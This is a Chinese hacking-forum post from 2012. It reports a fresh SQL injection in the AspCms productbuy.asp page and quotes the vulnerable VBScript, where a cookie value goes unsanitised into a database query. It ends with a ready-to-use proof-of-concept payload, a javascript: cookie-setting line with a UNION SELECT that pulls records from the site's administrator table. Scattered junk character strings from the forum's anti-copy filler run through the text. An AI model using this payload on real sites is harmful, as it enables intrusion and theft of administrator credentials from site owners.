好久没上土司了,上来一看发现在删号名单内.....
% q' g9 g3 v) I7 F+ |1 h/ I: J也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
( M& d' d9 ^7 u, R/ G5 ?废话不多说,看代码:
: n3 l3 C7 y, @3 c8 @" S/ ^2 r! J* X1 k6 I! `
<%: d* V8 ] k* N6 X# R
2 N! F! |( J Q4 U" [, a
if action = "buy" then
3 l/ ^) T( V& ]- w* r: A" X5 u/ v
$ k7 [5 u5 s/ e5 ?" o( n addOrder(), @* s7 U7 x, B$ r- k
4 P5 K+ A6 C d1 {8 v, ^else
5 R& Q8 ~) ]8 m4 U4 S- o& V
6 S' X% h8 K; k0 |' e echoContent()" _8 ~9 n4 d9 x' i
9 m- R6 w9 ]4 O. z
end if, m7 \* p% x7 ~9 G
$ [5 w; d! L/ _9 e# e1 u
+ i ^3 r3 s% H5 `! n0 `- d6 S) D
& P. f5 g6 t( F$ k3 r: S……略过8 r- `7 N$ \3 p+ x6 X
' j4 _4 @' H8 H" c* i/ ]$ S4 d( m2 y7 B" _' k: ^/ ?
* H9 D4 @; g3 c, f/ x7 y. |Sub echoContent()
% |/ v4 ^$ q% p; i1 e8 H1 R5 J; n. L7 P6 ]3 o& j' v+ n
dim id
0 } a( G) k' o0 s6 |
& l4 o5 ?$ y4 s, D+ g: f. g! \ id=getForm("id","get")" p2 u4 R2 B0 s5 A+ j
+ e3 _3 c/ l- p Q" g1 x- W4 O
+ m# W7 j6 H. c& L( X) r5 g; a5 z0 @7 p d( `' H# i4 {6 i
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 2 k' }" B/ B6 ]; e# X$ d: s* `! @
( t0 B- _3 a8 t. o7 D4 F
& }/ b: y, i# b" o1 s' @ Q
" S: l; x- c% { n2 v1 s dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")- Z; S% D* Q( `# N$ z8 d4 W
/ j; B# T( u) y+ F. p+ q) e2 r6 N
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
3 |3 B" ~, f8 f+ b( A p/ s9 X6 y1 s
Dim templatePath,tempStr
* L* t& g) ?- X& n0 A( W: Z& N8 j* ^
8 B$ N' G) g5 O. U templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
) _5 U( K5 F$ f+ T' m# R) h4 D1 k( n: I3 |) D/ R
' @' t3 }+ v, n
/ o# U# q/ {- o% Q: c, z7 O s set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")' f. h4 F; W0 S" L2 T
- N7 Y$ L1 X. B1 R8 o, o
selectproduct=rsObj(0)7 v- s% e( o- R5 t
# s4 d& w) j3 v5 L. Z! v# R 7 u% \ J( g- F# _
}- |' P: R4 S: X! A2 k5 _8 F Dim linkman,gender,phone,mobile,email,qq,address,postcode- F* r X$ E" x, h0 v8 m
/ M" i7 k% a& k7 j# H- o if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0; ?$ M7 u" t1 Y5 \/ H
- Y* o. d( i& q s if rCookie("loginstatus")=1 then 3 h4 L3 ~$ z$ |4 z3 l
0 l W C5 v9 c0 K4 y set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
# D4 h( b! O! Q7 w* h7 o/ \) i! c1 H- B- W* I
linkman=rsObj("truename")+ v% d# K/ T( j* V, O/ d
# P/ w8 c' C2 g" W! T! `
gender=rsObj("gender")
6 f& C0 W. N, ~% ], ^, F% ^$ T* ^- p5 k5 P& G
phone=rsObj("phone")$ ^$ V* n6 b6 S2 l3 z
" X! g2 U, t& S4 k: H0 w mobile=rsObj("mobile")$ ^0 ?. q% k. C w0 m0 T) O
1 U( e% `# N/ U7 B email=rsObj("email")8 t5 ~; W. H r
* k! f: g/ D+ r9 D qq=rsObj("qq")( C( ]" k+ E: V1 x& A0 |
5 ]- j, V* Q5 q4 y6 |# L address=rsObj("address")
# h9 a5 @! b. s) X% Q9 s+ r& w) o* [5 A- N' Z! L. c- _: Q S9 V
postcode=rsObj("postcode"), I& J/ G9 o k ~2 i+ r
) {/ g& T1 H5 B9 u m& U1 v. e" { else
: Z& Q) b( L4 v( r. N" p7 x
1 L1 F2 }" A6 w8 A' h. x! e. _ gender=1
M' J3 V! f* Y, {/ D. P( X: g
end if
2 b. p; n' l( F$ j1 G% q) F4 g2 W; |1 q
rsObj.close()9 R ?: O. ^" l/ F
$ K1 B8 p4 P3 T% i* u% U V0 ~ # L! H, o, f+ a0 X* N2 N4 C
; B+ D1 b8 B/ ~& j0 y with templateObj
: j1 B- e3 U1 P o" S* c( E8 C8 i, z, O8 }9 c- E6 W7 r) Z
.content=loadFile(templatePath) 9 S# u1 p3 T# T( k" K& }0 x
4 u$ S, k8 z# i6 u B
.parseHtml()
1 H. n0 J; k. a5 `+ w! ^7 l
2 l) F3 J4 `5 K2 k3 B& R .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
! E0 c h7 H! B+ j: d" H& }' c/ x+ k/ |$ Q* k k" D% i
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
6 j! S2 J% ^) @) s0 Q) F7 e/ ~3 {$ D$ K1 o" n4 v, ]- n
.content=replaceStr(.content,"[aspcms:gender]",gender)
9 G' W" r, Q/ g* [* x$ z" g* B% ?9 @0 S7 D
.content=replaceStr(.content,"[aspcms:phone]",phone)
; l( {7 [. y" o% R" P2 j6 \
6 ~/ t2 A7 y7 s8 o: s7 M- C .content=replaceStr(.content,"[aspcms:mobile]",mobile) 5 V- `; m7 Y, n: d* X! \
( |6 _+ G3 p3 V0 E' E
.content=replaceStr(.content,"[aspcms:email]",email)
- A# J9 _3 g& `3 u L0 a, z4 z! p* A4 T
.content=replaceStr(.content,"[aspcms:qq]",qq) $ A5 p% h% y+ I
* F0 ~' Y5 B2 O# h0 U9 d* d
.content=replaceStr(.content,"[aspcms:address]",address)
% n% O5 ^; Y4 G+ F4 J! |) w/ m
- S* B; X5 b3 p: F* ]- B0 H: G .content=replaceStr(.content,"[aspcms:postcode]",postcode) - ]4 B: Y: ]) @# \
7 I' X( f! T' Q" a8 W% O: f2 T
.parseCommon()
& |% S7 O. w: T/ Q2 I1 b
3 m% i z( I' e2 o; o/ ~) G0 A j echo .content * O; J1 `' x' C. m
* C0 [! p l' X. Q# t
end with
% |& a, K% H' d2 d1 e; i5 H& A8 } H
, N5 F q/ Y p set templateobj =nothing : terminateAllObjects
9 u( j) w, j) `$ r5 X/ |4 w1 x3 |1 D% b3 G
End Sub5 m1 W- Q) E7 l! _4 H* B
漏洞很明显,没啥好说的* w7 i7 X* d/ b' R
poc:
9 l1 ]( e9 L; @1 m% C J; S5 o* M( Z. R
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子) z+ H) }! l0 r; N$ Y
r( y5 r V4 \# j |
发表于 2012-12-27 08:35:05
收藏
支持
反对